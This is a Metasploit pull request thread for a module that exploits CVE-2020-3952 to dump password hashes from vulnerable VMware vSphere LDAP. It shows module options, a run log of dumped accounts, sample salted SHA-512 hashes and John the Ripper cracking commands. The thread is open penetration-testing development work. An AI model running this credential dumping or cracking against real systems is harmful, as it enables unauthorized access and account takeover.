Dump hashes with CVE-2020-3952 (VMWare Vsphere vmdir)
rapid7/metasploit-framework pull request #13865
Opened 2020-07-19 21:30 UTC by HynekPetrak

This is a new module leveraging CVE-2020-3952 to dump hashes from vulnerable VSphere LDAP. 
Hashes are saved to a file in Hashcat (`-m 1710`) and JtR (`-format='dynamic=sha512($p.$s)'`) format. 

Corrected credits on other CVE-2020-3952 related modules.

## Example 

```
Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap_dump_hashes):

   Name                 Current Setting    Required  Description
   ----                 ---------------    --------  -----------
   BASE_DN                                 no        LDAP base DN if you already have it
   OUTPUT_HASHCAT_FILE  vmdir_hashcat.txt  no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE     vmdir_john.txt     no        Save captured password hashes in john the ripper format
   RHOSTS               [redacted]        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                389                yes       The target port

msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap_dump_hashes) > run
[*] Running module against [redacted]

[*] Discovering base DN automatically
[*] Searching root DSE for base DN
[+] Discovered base DN: dc=vsphere,dc=local
[*] Dumping LDAP passwords from vmdir service at [redacted]:389
[+] 10.131.0.30:389 cn=[redacted],ou=Domain Controllers,dc=vsphere,dc=local:[redacted]
[+] 10.131.0.30:389 cn=Administrator,cn=Users,dc=vsphere,dc=local:[redacted]
[+] 10.131.0.30:389 cn=vmca/[redacted]@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:[redacted]
[+] 10.131.0.30:389 cn=ldap/[redacted]@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:[redacted]
[+] 10.131.0.30:389 cn=host/[redacted]@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:[redacted]
[*] Storing LDAP data in loot
[+] Saved LDAP data to /root/.msf4/loot/20200719171845_default_[redacted]_VMwarevCenterS_850962.txt
[*] Auxiliary module execution completed
```

2020-07-19 21:43 UTC, h00die commented
In theory you won't need the output files, as the creds command can do that already.
That being said, we'll need to add some new hash stuff to msf.

Can you provide a sample hash and associated password? If so, I can send a PR back to you with the associated changes

2020-07-19 21:51 UTC, HynekPetrak commented
Hi @h00die, it may take me a time.

2020-07-19 22:02 UTC, h00die commented
https://hashcat.net/wiki/doku.php?id=example_hashes

1710 | sha512($pass.$salt) | e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd:6352283260
-- | -- | --

https://fossies.org/linux/john/doc/DYNAMIC

it looks like JTR has `dynamic_82` which is `sha512($p.$s)`


Can you confirm what you are dumping has this same format:
```
$ irb
2.4.4 :001 > 'e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd:6352283260'.length
 => 139
2.4.4 :002 > 'e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd:6352283260'.index(':')
 => 128
```

It looks like it is, but just want to confirm.

2020-07-19 22:19 UTC, HynekPetrak commented
Sample hashes for a password `testpass`. For vmdir password type 01 (salted sha512) the salt is always 16 bytes.
```
hashcat:
10.0.0.1 cn=Administrator,cn=Users,dc=vsphere,dc=local:09486b2065eb6cb1e50fd9ee37c232d7a8654880172a7c348de5cf81f80c5929915f26cef17ce6e40fe474f53d595cf968eee7bbc1275248d2c5172642d1da7d:26037596705305554266639308182171
```

John:
```
10.0.0.1 cn=Administrator,cn=Users,dc=vsphere,dc=local:09486b2065eb6cb1e50fd9ee37c232d7a8654880172a7c348de5cf81f80c5929915f26cef17ce6e40fe474f53d595cf968eee7bbc1275248d2c5172642d1da7d$HEX$26037596705305554266639308182171
```

2020-07-19 22:35 UTC, h00die commented
Is there a reason you couldn't just update https://github.com/rapid7/metasploit-framework/blob/4293f8f59df1bcc3a01b546beefcd6b154fa49a1/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb to capture the password hash as well?

Figuring that, in theory, you won't need to dump to hashcat/jtr any more, and that help you on that side.

2020-07-19 22:50 UTC, HynekPetrak commented
> Is there a reason you couldn't just update https://github.com/rapid7/metasploit-framework/blob/4293f8f59df1bcc3a01b546beefcd6b154fa49a1/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb to capture the password hash as well?
> 

Hashes are not dumped with the same ldap search command like other information. But theoretically I could merge my code with the current module.

> Figuring that, in theory, you won't need to dump to hashcat/jtr any more, and that help you on that side.

Not sure what you mean. The binary array of userPassword attribute need to be parsed and converted into HC/JtR format.

2020-07-19 22:56 UTC, h00die commented
I would vote to merge, but its @wvu-r7 's module, so he would know best.

What I meant is, you shouldn't need a functionality to dump the hashes to JTR/hashcat within the module.  You should database the credentials with `create_credential`.  There are MANY examples of this.  That will add the hashes to the database for safe keeping.
Then I can help from there, to include:
https://github.com/rapid7/metasploit-framework/wiki/Hashes-and-Password-Cracking

1. add a new identifier to `metasploit/framework/hashes/identify` so you don't have to expressly set what password hash type it is aka `jtr_format`.
2. add a new reference to print the hash types correctly in jtr and hashcat formats, and what the flags are for processing each
3. update https://github.com/rapid7/metasploit-framework/wiki/Hashes-and-Password-Cracking
4. consider making an `ldap` cracker module.

In doing at least steps 1-3, you'll benefit by using `creds` command, which will use item 2 to export them in the correct format for the appropriate cracker.

2020-07-19 22:58 UTC, HynekPetrak commented
Clear, thank you for the hints.

2020-07-19 23:02 UTC, h00die commented
So, I think from here:
1. if @wvu-r7 (they will prob respond tomorrow) agrees, lets close this PR, and make a new one which modifies `modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb` to also (or optionally) extract the password and saves it with `create_credential` or `create_credential_and_login`.
2. store the password hashes in the JTR format you already have, I've arbitrarily decided that's the standard
3. when that PR is up, ping @h00die (by simply mentioning me in a comment) and I'll work with what you have to update the `hashes/identify` library, wiki, and the other library code so it looks good, feels good, and all is right.  I'll submit a PR to you, which you can incorporate, so all the changes are in one nice metasploit PR that is easy to review and land!

2020-07-20 00:54 UTC, wvu-r7 commented
@HynekPetrak: You discovered CVE-2020-3952? I didn't see any acknowledgements in the VMware advisory, sorry.

Yes, please modify the [existing module](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb) to add creds to the DB. I ran out of time.

2020-07-20 00:57 UTC, wvu requested changes
Answered.

2020-07-20 08:38 UTC, HynekPetrak commented
Hi @h00die, @wvu-r7 , I have created a new pull request #13868, that modifies the current module. Closing this one

2020-07-20 08:38 UTC, closed without merging

2020-07-21 00:02 UTC, wvu-r7 commented
# FYI

@HynekPetrak had e-mailed me to explain their discovery and the context for this PR, but I hadn't checked my e-mail before responding here. Apologies!

2020-07-21 00:12 UTC, h00die commented
@HynekPetrak I'm trying to get the JTR format working, can you compare to your output?

```
$ cat /tmp/jtr.dynamic_82 
cn=Administrator,cn=Users,dc=vsphere,dc=local:09486b2065eb6cb1e50fd9ee37c232d7a8654880172a7c348de5cf81f80c5929915f26cef17ce6e40fe474f53d595cf968eee7bbc1275248d2c5172642d1da7d$HEX$26037596705305554266639308182171

$ sudo john --wordlist=/tmp/wordlist -format='dynamic=sha512($p.$s)' /tmp/jtr.dynamic_82
Using default input encoding: UTF-8
Loaded 1 password hash (dynamic=sha512($p.$s) [256/256 AVX2 4x])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates left, minimum 48 needed for performance.
0g 0:00:00:00 DONE (2020-07-20 19:39) 0g/s 150.0p/s 150.0c/s 150.0C/s a..b
Session completed

$ sudo john -h
John the Ripper 1.9.0-jumbo-1 OMP [linux-gnu 64-bit x86_64 AVX2 AC]

$ cat /tmp/wordlist 
a
testpass
b
```

2020-07-21 00:15 UTC, wvu-r7 commented
Talk on #13868, please and thank you!